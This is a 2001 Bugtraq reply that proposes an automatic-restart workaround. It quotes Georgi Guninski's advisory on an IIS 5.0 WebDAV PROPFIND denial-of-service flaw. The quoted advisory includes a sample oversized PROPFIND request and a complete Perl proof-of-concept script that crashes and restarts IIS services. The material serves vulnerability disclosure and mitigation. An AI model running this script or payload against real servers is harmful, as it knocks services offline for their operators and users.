Re: IIS 5.0 PROPFIND DOS

[Tiago Halm <thalm () LONDONOFFICE COM>]

While Microsoft is solving this issue and there is no
patch available, I recommend the following workaround
successfully tried over IIS 5.0 (Windows 2000) and IIS 5.1 (Whistler).

Create a batch file (ex: workaround.bat) with the following 2 lines:

IISRESET /STOP
IISRESET /START

save the file in a safe place not acessible by HTTP.

Then
1 - Click "Properties" in the "World Wide Web Publishing Service" service
2 - Choose the "Recovery" tab
3 - Select the "Run a File" option in the "First Failure" combo box.
4 - In the "Run file" text box, type the full pathname of your batch file
created above.
5 - Repeat this procedure for the "Second failure" and "Subsequent failures"
combo boxes.

In case of problems using this approach, any input is appreciated!

Tiago Halm


-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf Of Georgi
Guninski
Sent: quinta-feira, 8 de Marco de 2001 10:51
To: BUGTRAQ () SECURITYFOCUS COM
Subject: IIS 5.0 PROPFIND DOS


Georgi Guninski security advisory #38, 2001

IIS 5.0 PROPFIND DOS

Systems affected:
IIS 5.0

Risk: Medium but may turn more serious
Date: 8 March 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it
unmodified.
You may not modify it and distribute it or distribute parts of it without
the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of
any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this
advisory or program or
any derivatives thereof.


Description:

It is possible to remotely restart all IIS related service using specially
crafted request.
It is also possible to force IIS to consume memory which it does not free.
Seems to be a buffer overflow, don't know whether it is exploitable, let me
know if you find
a way to exploit it.



Details:

Basically the problem are very long but valid propfind request.
For example the following PROPFIND request works for me:
---------------------
<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:u="over:"><a:prop><a:displayname /><u:$over
/></a:prop>
</a:propfind>
---------------------
where length($over) ~ 128008
The first time the request is send IIS replies with 500 ... Exception. The
second time the services are
restarted.




--vv5.pl--------------------------------------------------------------------
-----
#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;

print "IIS 5.0 propfind\n";

$port = @ARGV[1];
$host = @ARGV[0];


sub vv()
{

$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow

$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto =>
"TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over
/>".'</a:prop></a:propfind>'."\n\n";
# ^^^^ This is another issue and also works with length ~>65000


$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over
/>".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}


do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";
---------------------------------------------------------------------------

Demonstration:


Workoround: Disable WebDav extensions and PROPFIND though I do not recommend
using IIS on the Internet.


Vendor status:
Microsoft was informed on 3 March 2001



Happy 8 March to the women.

Regards,
Georgi Guninski
http://www.guninski.com